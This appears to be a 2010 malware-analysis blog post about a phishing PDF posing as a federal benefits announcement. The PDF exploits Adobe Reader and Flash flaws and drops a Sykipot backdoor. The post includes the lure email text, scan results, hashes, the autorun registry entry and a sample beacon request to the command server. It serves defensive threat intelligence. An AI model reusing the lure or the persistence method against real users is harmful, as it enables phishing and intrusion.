Wednesday, November 10, 2010

CVE-2010-3654 Adobe Reader 0 day + CVE-2010-2883 Flash + Reader PDF Federal Benefits

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3654 Adobe Flash Player and earlier on Windows, Mac OS X, Linux, and Solaris and and earlier on Android, and authplay.dll (aka AuthPlayLib.bundle or in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. 

Post Updates

Update 6, Nov 16  2010-------------------------------------------------------------------------------------------
After yesterday tweets (snowfl0w and sempersecurus), GoDaddy took notice and suspended domain
here is the email
---------- Forwarded message ----------
From: GoDaddy Abuse Department
Date: Tue, Nov 16, 2010 at 11:16 AM
Subject: RE: reminder - complaint
To: Mila

Dear Mila Parkour,

Thank you for bringing this situation to our attention. We have gone
ahead and suspended the domain name in question.
Please let us know if you find any other domain names connected to C&C
servers or other malware distribution.
Spam and Abuse Department
24/7 Abuse Department Hotline: 480-624-2505
 Here is current Whois
debby ryan
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002

Registered through:, Inc. (
Created on: 15-Sep-10
Expires on: 15-Sep-11
Last Updated on: 15-Sep-10

Administrative Contact:
ryan, debby
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
+86.9801455 Fax --

Technical Contact:
ryan, debby
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
+86.9801455 Fax --

Domain servers in listed order:

Update 5, Nov 15 2010------------------------------------------------------------------------------------------- domain is still active. resent the message below to  
Hostname:  - Is it C&C or someone's sinkhole? Anybody?

Update 4, Nov 13 2010------------------------------------------------------------------------------------------- domain is still active
The message that was sent to GoDaddy abuse department on Nov 10, 2010 read
Dear GoDaddy Abuse Department, has been C&C for 0-days malware  

and used in targeted attacks described above.
Please take action asap
Update 3 Nov 11, 2010-------------------------------------------------------------------------------------------
Nov 10, 2010
GoDaddy Abuse dept was contacted via email on Nov 10 with the request to take action and suspend - used as C&C in the folowing 0day adobe attacks for 3 months in a row:
has been C&C for 0-days malware
Nov 11, 2010 is still active

Update 2 Nov 10, 2010----------------------------------------------------------------------------
from Brad Arkin Senior Director, Product Security & Privacy for Adobe Systems:
an update for adobe reader will be released next week to address cve-2010-3654. 9.4.0 is vulnerable.

@ jduck1337
Re: - Adobe Reader bundles its own version of Flash. It is not updated

Update 1 Nov 10, 2010-----------------------------------------------------------------------------
Screenshot made today, November 10, 2010

I thought this  Security update available for Adobe Flash Player November 4, 2010 with new Flash would fix the problem.

  General File Information

File Open Season Announcements.pdf
File size :
111729 bytes
Type:  PDF
Distribution: Email attachment


Original Message

From: []
Sent: Wednesday, November 10, 2010 7:33 AM
Subject: Federal Benefits Open Season Begins On November 10

This is the time of year to ensure that you have the right health,
dental, or vision insurance coverage for you and your family. It is
also time for you to consider the out-of-pocket medical or dependent
care expenses you can save money on in 2011. The open season will run
November 10, 2010, through December 13, 2010. You should read the Open
Season Announcement (see the attached) thoroughly for important
information pertaining to each program.

The following three programs will be participating in this year's Open
Season for the 2011 plan year:
1.Federal Employees Health Benefits (FEHB) Program;
2.Federal Employees Dental and Vision Insurance Program (FEDVIP);
3.Flexible Spending Accounts (FSA) Program.

Please remember that there are no longer open seasons for the Thrift
Savings Plan (TSP). You may start, stop, or change your TSP
contributions at any time via myPay (DFAS), provided you are eligible
to participate in the TSP.

Message Headers

Received: from [] by via HTTP; Wed, 10 Nov 2010 04:32:55 PST
Date: Wed, 10 Nov 2010 04:32:55 -0800
From: ""
Reply-To: ""
Message-ID: <855251712.57555.1289392517031.JavaMail.service@localhost>
Subject: Federal Benefits Open Season Begins On November 10
MIME-Version: 1.0
Content-Type: multipart/mixed;
Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=;
Authentication-Results:; spf=pass ( best guess record for domain of designates as permitted sender); dkim=pass (test mode)
X-Yahoo-Newman-Property: ymail-3
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;; s=s1024; t=1289392375; bh=JwcFHdceH3fqqdYHdMAn56STB43egwMkweBMk6XmrFs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=5My/a8O9f9L1V7zXZkIRZ8IcN+UbseUxx50qRLsVsMra6zq7MWdmA0rcayL19usi2IVAdLJRJbgTrkAbXmc1Q4u/lCISSMj5D10t+/4BsqCDD0ZEdaoa4W4VDZNj92Nv7He1mXNCpv6NLF9+BQletQNYCCOqxCrB9DUZRW4xAUU=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
X-YMail-OSG: ZbW_TywVM1njbfFrytll2Be76lGDNQqcG_QM8kxiaDCEfzd
X-Mailer: YahooMailRC/504.5 YahooMailWebService/


ISP:    EGIHosting
Organization:    EGIHosting
Country:    United States us flag
State/Region:    California
City:    Milpitas

Same ISP and IP range as posted earlier  in

Automated Scans

File name: Open Season Announcements.pdf
Submission date: 2010-11-10 15:43:15 (UTC)
Result: 7/ 43 (16.3%)
AhnLab-V3 2010.11.10.02 2010.11.10 SWF/Cve-2010-3654
AntiVir 2010.11.10 EXP/CVE-2010-3654.A
DrWeb 2010.11.10 Exploit.PDF.1641
Fortinet 2010.11.10 PDF/CoolType!exploit.CVE20102883
Kaspersky 2010.11.10 Exploit.Win32.CVE-2010-3654.a
Microsoft 1.6301 2010.11.10 Exploit:Win32/CVE-2010-2883.A
Sophos 4.59.0 2010.11.10 Mal/PDFJs-Z
MD5   : d143a09611c45ac34ff0f85cc5efcc2e
SHA1  : a2378a47bf084a155974b6fd20559732ecac1608

From Malware tracker (thank you)
content/type: PDF document, version 1.6
Object 12.0 @ 1395: suspicious.flash Embedded Flash define obj
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 29.0 @ 102721: suspicious.string heap spray shellcode
Object 35.0 @ 5648: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 39.0 @ 8560: suspicious.obfuscation using substring
Object 39.0 @ 8560: suspicious.obfuscation using String.replace
Object 49.0 @ 15067: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
Object 50.0 @ 15464: suspicious.flash Embedded Flash
Object 50.0 @ 15464: flash.exploit CVE-2010-3654
Object 56.0 @ 12318: suspicious.obfuscation using unescape

Files Created

Decoy file
%Temp%\Open Season Announcements.pdf
MD5   : db1991c1120c3f75991cbe91c2649ad3

\Local Settings\adobeupdate.exe
File name:adobeupdate.exe
Submission date:2010-11-10 19:49:23 (UTC)
Result:15/ 43 (34.9%)
AntiVir    2010.11.10    TR/Dropper.Gen
Authentium    2010.11.10    W32/Heuristic-257!Eldorado
BitDefender    7.2    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
DrWeb    2010.11.10    BACKDOOR.Trojan
F-Prot    2010.11.10    W32/Heuristic-257!Eldorado
F-Secure    9.0.16160.0    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
GData    21    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
K7AntiVirus    9.67.2940    2010.11.09    Riskware
Kaspersky    2010.11.10    Heur.Invader
McAfee-GW-Edition    2010.1C    2010.11.10    Heuristic.BehavesLike.Win32.Trojan.H
Microsoft    1.6301    2010.11.10    Trojan:Win32/Wisp.A
NOD32    5608    2010.11.10    probably a variant of Win32/Wisp.A
Panda    2010.11.10    Suspicious file
Sophos    4.59.0    2010.11.10    Mal/Mdrop-B
VBA32    2010.11.09    suspected of Win32.Trojan.Downloader
MD5   : 27ba4695567a60f25a32bab240b3b832
SHA1  : 8f9e5aee02a4b340faae1a8057db419a34ace951
SHA256: 590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e
ssdeep: 768:OpUElc+SsQvCXVD/5HiS/LcMRt50fQtW96VTD+eXrAyb:ZEUS3H3H750fQOQAw
File size : 37376 bytes


    * The newly created Registry Value is:
          o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
                + start = "%UserProfile%\LOCALS~1\adobeupdate.exe -installkys"

            so that adobeupdate.exe runs every time Windows starts
  • Analysis of the file resources indicate the following possible country of origin:


 Sykipot exploits an Adobe Flash Zero-Day  Kaspersky
Read full analysis at the link above. This is an excerpt
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built in unistall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. 
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/, application/, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009021910 Firefox/3.0.7
Cache-Control: no-cache

Network activity -  
ISP:    Cox Communications
Organization:    Cox Communications
Country:    United States 
State/Region:    Arizona
City:    Peoria

Compare to ips for the same domain posted earlier

Nov 10, 2010
GoDaddy Abuse dept was contacted Nov 10 with the request to take action and suspend - used as C&C in the folowing 0day adobe attacks for 3 months in a row:
has been C&C for 0-days malware
Nov 11, 2010 is still active

United States
Proxy-registered route object
COX-PHX Cox Communications Inc.
United States
PAH-INC Go Daddy Software, Inc.
5 hours old
United States
5 hours old
United States
9 days old
(only in delegation)
United States
10 hours old
United States
13 hours old
United States

No comments:

Post a Comment